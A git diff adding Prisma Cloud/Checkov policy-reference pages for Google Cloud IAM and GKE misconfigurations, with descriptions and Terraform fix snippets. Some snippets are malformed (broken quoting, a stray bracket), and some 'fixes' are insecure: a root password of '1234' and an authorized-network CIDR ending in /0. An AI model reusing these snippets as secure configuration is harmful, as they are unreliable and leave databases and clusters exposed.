+*project-id@appspot.gserviceaccount.com* + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_organization_iam_member google_organization_iam_binding +* *Arguments:* member + + +[source,go] +---- +{ + "resource "google_organization_iam_member" "organization" { + org_id = "your-org-id" + role = "roles/owner" +- member = "project-number-compute@developer.gserviceaccount.com" +- member = "project-id@appspot.gserviceaccount.com" +}", + + "name": "google_organization_iam_member" + }, + + { + "code": "resource "google_organization_iam_member" "organization" { + org_id = "your-org-id" + role = "roles/owner" +- members = [ + "project-number-compute@developer.gserviceaccount.com", + "project-id@appspot.gserviceaccount.com" + ] +}", + + "name": "google_organization_iam_binding" +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-9.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-9.adoc new file mode 100644 index 000000000..558b45f19 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-9.adoc @@ -0,0 +1,105 @@ +== Default Service Account is used at folder level + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f5f3d0db-2599-4b01-aced-b5f2a69525ec + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py[CKV_GCP_48] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +* Default Service Account is used at folder level* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f5f3d0db-2599-4b01-aced-b5f2a69525ec + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py[CKV_GCP_48] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +A service account is a special Google account that belongs to an application or a VM, not to an individual end-user. +The application uses the service account to call the service's Google API so that users are not directly involved. +Service accounts represent service-level security of application or VM Resources, determined by the roles assigned to them. +The use of Default service accounts should be avoided, see below for details. +We recommend you do not set IAM role bindings using the default Compute Engine and App Engine service account. +*Default Compute Engine Service Account*: Used by GKE, Compute, DataProc, DataFlow, Composer. +*project-number-compute@developer.gserviceaccount.com* +*Default Appspot Service Account*: Used by App Engine, Cloud Functions, App Engine based services. +*project-id@appspot.gserviceaccount.com* + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_folder_iam_member google_folder_iam_binding +* *Arguments:* role + member + + +[source,go] +---- +{ + "resource "google_folder_iam_member" "folder" { + folder = "folders/1234567" + role = "roles/owner" +- member = "project-number-compute@developer.gserviceaccount.com" +- member = "project-id@appspot.gserviceaccount.com" +}", + + "name": "google_folder_iam_member" + }, + + { + "code": "resource "google_folder_iam_member" "folder" { + folder = "folders/1234567" + role = "roles/owner" +- members = [ + "project-number-compute@developer.gserviceaccount.com", + "project-id@appspot.gserviceaccount.com" + ] +}", + + "name": "google_folder_iam_binding" +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-gcp-cloud-kms-key-rings-is-not-publicly-accessible-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-gcp-cloud-kms-key-rings-is-not-publicly-accessible-1.adoc new file mode 100644 index 000000000..0ba220fdc --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-gcp-cloud-kms-key-rings-is-not-publicly-accessible-1.adoc @@ -0,0 +1,135 @@ +== GCP Cloud KMS Key Rings are anonymously or publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d3c19de3-1388-4d33-972e-a0b1d6a19d02 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml[CKV2_GCP_8] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + +//// +Bridgecrew + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d3c19de3-1388-4d33-972e-a0b1d6a19d02 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml [CKV2_GCP_8] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== +//// + + +=== Description + + +GCP Cloud KMS key rings contain your encryption keys, and allowing anonymous or public access to a key ring grants permissions for anyone to access the cryptokeys stored inside the ring. +CryptoKeys should only be accessed by trusted parties because they are commonly used to protect sensitive data. +We recommend you ensure anonymous and public access to KMS key rings is not allowed. + +//// +=== Fix - Runtime + + +* GCP Console* + + +To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/security/kms/keyrings [Key Management]. + +. On the * Key Rings* details page, select your _key ring_. + +. Click the * SHOW INFO PANEL* side bar. + +. To remove a specific role assignment, to the front of * allUsers* and * allAuthenticatedUsers*, click * Delete*. + + +* CLI Command* + + +To remove access to * allUsers* and * allAuthenticatedUsers*, use the following command: +---- +gcloud kms keyrings remove-iam-policy-binding KEY-RING \ +--location LOCATION \ +--member PRINCIPAL \ +--role roles/ROLE-NAME +---- +Replace * KEY-RING* with the name of the key ring. +Replace * LOCATION* with the location of the key ring. +Replace * PRINCIPAL* with either * allUsers* or * allAuthenticatedUsers*. +Replace * ROLE-NAME* with the name of the role to remove. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_kms_key_ring_iam_member +* *Field:* member +* *Resource:* google_kms_key_ring_iam_binding +* *Field:* members + + +[source,text] +---- +{ + " + //Option 1 +resource "google_kms_key_ring_iam_member" "member" { + key_ring_id = google_kms_key_ring.default.id + role = "roles/cloudkms.cryptoKeyEncrypter" +- member = "allUsers" +- member = "allAuthenticatedUsers" +} + + +//Option 2 +resource "google_kms_key_ring_iam_binding" "binding" { + key_ring_id = google_kms_key_ring.default.id + role = "roles/cloudkms.cryptoKeyEncrypter" + members = [ +- "allUsers", +- "allAuthenticatedUsers" + ] +} + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-that-a-mysql-database-instance-does-not-allow-anyone-to-connect-with-administrative-privileges.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-that-a-mysql-database-instance-does-not-allow-anyone-to-connect-with-administrative-privileges.adoc new file mode 100644 index 000000000..83594abc5 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/ensure-that-a-mysql-database-instance-does-not-allow-anyone-to-connect-with-administrative-privileges.adoc @@ -0,0 +1,59 @@ +== A MySQL database instance allows anyone to connect with administrative privileges + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d2a0c2ce-19b3-4894-89d5-b01e8dd0fb5d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml[CKV2_GCP_7] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +It is recommended to set a password for the administrative user (root by default) to prevent unauthorized access to the SQL database instances. +This recommendation is applicable only for MySQL Instances. +PostgreSQL does not offer any setting for No Password from the cloud console. +At the time of MySQL Instance creation, not providing an administrative password allows anyone to connect to the SQL database instance with administrative privileges. +The root password should be set to ensure only authorized users have these privileges. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_sql_database_instance +* *Arguments:* google_sql_user + + +[source,go] +---- +{ + "resource "google_sql_user" "root_with_password" { + name = "root" + instance = google_sql_database_instance.db_instance.name + host = "me.com" ++ password = "1234" +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/google-cloud-iam-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/google-cloud-iam-policies.adoc new file mode 100644 index 000000000..c9b978f6c --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/google-cloud-iam-policies.adoc @@ -0,0 +1,69 @@ +== Google Cloud IAM Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-iam-1.adoc[GCP VM instance configured with default service account] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py[CKV_GCP_30] +|MEDIUM + + +|xref:bc-gcp-iam-10.adoc[GCP IAM primitive roles are in use] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py[CKV_GCP_49] +|MEDIUM + + +|xref:bc-gcp-iam-2.adoc[GCP VM instance using a default service account with full access to all Cloud APIs] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py[CKV_GCP_31] +|MEDIUM + + +|xref:bc-gcp-iam-3.adoc[GCP IAM user are assigned Service Account User or Service Account Token creator roles at project level] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py[CKV_GCP_41] +|HIGH + + +|xref:bc-gcp-iam-4.adoc[GCP IAM Service account does have admin privileges] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py[CKV_GCP_42] +|HIGH + + +|xref:bc-gcp-iam-5.adoc[Roles impersonate or manage Service Accounts used at folder level] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py[CKV_GCP_44] +|HIGH + + +|xref:bc-gcp-iam-6.adoc[Roles impersonate or manage Service Accounts used at organizational level] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py[CKV_GCP_45] +|HIGH + + +|xref:bc-gcp-iam-7.adoc[Default Service Account is used at project level] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py[CKV_GCP_46] +|HIGH + + +|xref:bc-gcp-iam-8.adoc[Default Service Account is used at organization level] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py[CKV_GCP_47] +|HIGH + + +|xref:bc-gcp-iam-9.adoc[Default Service Account is used at folder level] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py[CKV_GCP_48] +|HIGH + + +|xref:ensure-gcp-cloud-kms-key-rings-is-not-publicly-accessible-1.adoc[GCP Cloud KMS Key Rings are anonymously or publicly accessible] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml[CKV2_GCP_8] +|HIGH + + +|xref:ensure-that-a-mysql-database-instance-does-not-allow-anyone-to-connect-with-administrative-privileges.adoc[A MySQL database instance allows anyone to connect with administrative privileges] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml[CKV2_GCP_7] +|LOW + + +|=== + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-1.adoc new file mode 100644 index 000000000..ecd0cd477 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-1.adoc @@ -0,0 +1,59 @@ +== GCP Kubernetes Engine Clusters have Stackdriver Logging disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 53793c32-dd41-430f-bbea-2f002ddafe42 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py[CKV_GCP_1] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Stackdriver is the default logging solution for clusters deployed on GKE. +Stackdriver logging is deployed to a new cluster by default, explicitly set to *opt-out*. +Stackdriver logging collects only the container's standard output and standard error streams. +To ingest logs, Stackdriver logging agent must be deployed to each node in the cluster. +Stackdriver provides a single-pane-of-glass view of metrics, logs, and traces through Kubernetes Engine clusters and workloads. +We recommend you use Stackdriver logging as a unified data logging solution for GKE workloads unless additional observability tooling is already in place. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_container_cluster" "primary" { + name = "my-gke-cluster" + location = "us-central1" + remove_default_node_pool = true + initial_node_count = 1 + logging_service = "logging.googleapis.com/kubernetes" +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-10.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-10.adoc new file mode 100644 index 000000000..7fe5ec244 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-10.adoc @@ -0,0 +1,53 @@ +== GKE control plane is public + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f3d16b54-4fb0-4e19-a797-a257c0078c70 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py[CKV_GCP_18] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The GKE cluster control plane and nodes have internet routable addresses that can be accessed from any IP address by default. +Direct internet access to nodes can be disabled by specifying the Gcloud tool option *enable-private-nodes* at cluster creation. +We recommend you disable direct internet access to nodes at cluster creation and ensure clusters use master authorized networks and private nodes to reach the control plane by whitelisted CIDRs, nodes within the cluster VPC and Google management jobs. +We also recommend you limit the exposure of the cluster control plane and nodes to the internet. +These settings can only be set at cluster creation time and help ensure sensitive controllers are not exposed to external access. + +=== Fix - Buildtime + + +*Terraform* + + +[source,go] +---- +resource "google_container_cluster" "primary" { + name = "marcellus-wallace" + location = "us-central1-a" + initial_node_count = 3 + private_cluster_config { + enable_private_nodes = true + } + } +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-11.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-11.adoc new file mode 100644 index 000000000..e5869c95b --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-11.adoc @@ -0,0 +1,64 @@ +== GCP Kubernetes Engine Clusters Basic Authentication is set to Enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6e125379-081e-4b06-a7ba-f04da2f0901a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py[CKV_GCP_19] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +GKE supports multiple secure authentication methods, including service account bearer tokens, OAuth tokens, x509 client certificates. +Basic authentication and client certificate issuance are disabled by default for clusters created with GKE 1.12 and later. +We recommend you use Cloud IAM, or an alternative secure authentication mechanism, as the identity provider for GKE clusters. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_container_cluster" "pass2" { + name = "google_cluster" + monitoring_service = "monitoring.googleapis.com" + master_authorized_networks_config {} + master_auth { + username = "" + password = "" + client_certificate_config { + issue_client_certificate = false + } + + } + +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-12.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-12.adoc new file mode 100644 index 000000000..f0aafcc44 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-12.adoc @@ -0,0 +1,71 @@ +== GCP Kubernetes Engine Clusters have Master authorized networks disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e1b70bb4-bb77-4326-93d5-5dd9c5170d3f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py[CKV_GCP_20] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Authorized networks allow whitelisting of specific CIDR ranges and permit IP addresses in those ranges to access the cluster master endpoint using HTTPS. +GKE uses both TLS and authentication to secure access to the cluster master endpoint from the public Internet. +This approach enables the flexibility to administer the cluster from anywhere. +We recommend you enable *master authorized networks* in GKE clusters. +Using authorized networks you will be able further restrict access to specified sets of IP addresses. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_container_cluster" "primary" { + name = "marcellus-wallace" + location = "us-central1-a" + initial_node_count = 3 + master_auth { + client_certificate_config { + issue_client_certificate = false + } + + } + master_authorized_networks_config { + cidr_blocks { + cidr_block ="10.10.10.10/0" + display_name = "foo" + } + + } +} + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-13.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-13.adoc new file mode 100644 index 000000000..71fff3270 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-13.adoc @@ -0,0 +1,83 @@ +== GCP Kubernetes Engine Clusters without any label information + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1a4127c1-6acd-4aca-9010-4eaa776e3ee0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEHasLabels.py[CKV_GCP_21] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Labels are key, value pairs that are attached to objects intended to be used to specify identifying attributes of objects that are meaningful and relevant to users, but do not directly imply semantics to the core system. +Labels can be used to organize and select subsets of objects. +Labels can be attached to objects at creation time and subsequently added and modified at any time. +Each object can have a set of key/value labels defined. +Each Key must be unique for a given object. +Labels enable users to map their own organizational structures onto system objects in a loosely coupled fashion, without requiring clients to store these mappings. +We recommend you configure Kubernetes clusters with labels. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_container_cluster" "primary" { + name = "marcellus-wallace" + location = "us-central1-a" + initial_node_count = 3 + master_auth { + client_certificate_config { + issue_client_certificate = false + } + + } + node_config { + # Google recommends custom service accounts that have cloud-platform scope and permissions granted via IAM Roles. + service_account = google_service_account.default.email + oauth_scopes = [ + "https://www.googleapis.com/auth/cloud-platform" + ] + labels = { + foo = "bar" + } + + tags = ["foo", "bar"] + } + + timeouts { + create = "30m" + update = "40m" + } + +} +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-14.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-14.adoc new file mode 100644 index 000000000..e8773b0c2 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-14.adoc @@ -0,0 +1,70 @@ +== GCP Kubernetes Engine Clusters not using Container-Optimized OS for Node image + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e41fea47-678f-4aeb-97a8-bdf721d08e57 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py[CKV_GCP_22] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +GKE enables users to select the operating system image that runs on each node. +You can also upgrade an existing cluster to use a different node image type. +GKE supports several OS images using the main container runtime directly integrated with Kubernetes, including *cos_containerd* and *ubuntu_containerd*. +We recommend you use *cos_containerd* and *ubuntu_containerd* to enhance node security. +*Containerd* is an industry-standard container runtime component that regularly updates security fixes and patches, providing better support, security, and stability than other images. + +//// +=== Fix - Runtime + + +* Gcloud CLI* + + +Use this following command to upgrade the cluster to use the `COS` image: +[,bash] +---- +gcloud container clusters upgrade --image-type cos cluster-name +---- +---- +To upgrade a specific node-pool add the flag/argument `--node-pool node-pool-name`. +//// + +=== Fix - Buildtime + + +*Terraform* + + +Add the *image_type* argument into the *node_config* bloc to your *google_container_cluster* or *google_container_node_pool* resource: + +---- +hcl +node_config { +image_type = "COS" +} +---- + +It should force the cluster to recreate a node following the new configuration. +For further information please follow this link: https://www.terraform.io/docs/providers/google/r/container_cluster.html#image_type diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-15.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-15.adoc new file mode 100644 index 000000000..242ba0179 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-15.adoc @@ -0,0 +1,61 @@ +== GCP Kubernetes Engine Clusters have Alias IP disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 63b162f4-628c-4d4a-a094-63c12ebc4ba2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py[CKV_GCP_23] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +In GKE, clusters can be set apart based on how they route traffic from one pod to another. +A cluster that uses alias IP ranges is called a VPC-native cluster. +A cluster that uses Google Cloud Routes is called a routes-based cluster. +We recommend you create Kubernetes clusters with alias IP ranges enabled. +Alias IP ranges allow Pods to directly access hosted services without using a NAT gateway. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_container_cluster" "primary" { + name = "my-gke-cluster" + location = "us-central1" + remove_default_node_pool = true + initial_node_count = 1 + ip_allocation_policy + { + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-2.adoc new file mode 100644 index 000000000..0ae333659 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-2.adoc @@ -0,0 +1,59 @@ +== GCP Kubernetes Engine Clusters have Legacy Authorization enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f57baa2a-6039-4a17-94e8-0be723bcdc75 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py[CKV_GCP_7] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Kubernetes RBAC (Role-Based Access Control) can be used to grant permissions to resources at the cluster and namespace level. +It allows defining roles with rules containing a set of permissions. +RBAC has significant security advantages and is now stable in Kubernetes, superseding the benefits of legacy authorization with ABAC (Attribute-Based Access Control). +We recommend you disable ABAC authorization and use RBAC in GKE instead. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_container_cluster" "primary" { + name = "my-gke-cluster" + location = "us-central1" + remove_default_node_pool = true + initial_node_count = 1 + logging_service = "logging.googleapis.com/kubernetes" + enable_legacy_abac = false +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-3.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-3.adoc new file mode 100644 index 000000000..48eba25fe --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-3.adoc @@ -0,0 +1,60 @@ +== GCP Kubernetes Engine Clusters have Cloud Monitoring disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ca4b4654-d36a-4b17-a055-9c5063fa2f41 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py[CKV_GCP_8] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Stackdriver is the default logging solution for clusters deployed on GKE. +Stackdriver logging is deployed to a new cluster by default, explicitly set to *opt-out*. +Stackdriver logging collects only the container's standard output and standard error streams. +To ingest logs, Stackdriver logging agent must be deployed to each node in the cluster. +Stackdriver provides a single-pane-of-glass view of metrics, logs, and traces through Kubernetes Engine clusters and workloads. +We recommend you use Stackdriver logging as a unified data logging solution for GKE workloads unless additional observability tooling is already in place. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_container_cluster" "primary" { + name = "my-gke-cluster" + location = "us-central1" + remove_default_node_pool = true + initial_node_count = 1 + monitoring_service = "monitoring.googleapis.com/kubernetes" +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-4.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-4.adoc new file mode 100644 index 000000000..7a58587a5 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-4.adoc @@ -0,0 +1,73 @@ +== GCP Kubernetes cluster node auto-repair configuration disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0e72ff6d-9d6e-4fa1-8c3b-b815b9e4d459 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py[CKV_GCP_9] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Auto-repairing mode in GKE is an automated service that identifies and repairs a failing node to maintain a healthy running state. +GKE makes periodic checks on the health state of each node in the cluster. +If a node fails consecutive health checks over an extended time period, GKE initiates a repair process for that node. +We recommend automatic node repair is enabled on kubernetes clusters to provide continued operation of mission critical nodes and ensuring applications are operating based on their pre-defined specs, minimized downstream failures and redundant alerting and triage. + +//// +=== Fix - Runtime + + +* Gcloud CLI* + + +Use the following command line to enable the node-pool automatic repair feature: +[,bash] +---- +gcloud container node-pools update pool-name +--cluster cluster-name \ +--zone compute-zone \ +--enable-autorepair +---- + +More information here: https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-repai +//// + +=== Fix - Buildtime + + +*Terraform* + + +Add the following code bloc into your `google_container_node_pool` resource: + +---- +management { +auto_repair = true +} +---- + +If you don't have a separated node-pool resource on your terraform codebase, you can refer to the *Gcloud CLI* part. +You will first need to recover the name of the node pool through the console or the CLI. +Please be reminded that it is best practice to delete the default node-pool from the cluster and to create a specific one using the *google_container_node_pool* resource. +More information here: https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-repair diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-5.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-5.adoc new file mode 100644 index 000000000..055de2809 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-5.adoc @@ -0,0 +1,64 @@ +== GCP Kubernetes cluster node auto-upgrade configuration disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f70918b1-7c19-4de6-b851-967bea5648ba + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py[CKV_GCP_10] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Node *auto-upgrade* keeps nodes up-to-date with the latest cluster master version when your master is updated on your behalf. +When a new cluster or node pool is created, node *auto-upgrade* is enabled as default. +We recommend you ensure *auto-upgrade* is enabled. +Automatic node upgrade ensures that when new binaries are released you instantly get a fix with the latest security issues resolved. +GKE will automatically ensure that security updates are applied and kept up to date. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_container_node_pool" "primary_preemptible_nodes" { + name = "my-node-pool" + cluster = google_container_cluster.primary.id + node_count = 1 + management { + auto_upgrade = true + } + + ] + + } + +}", +} +---- + 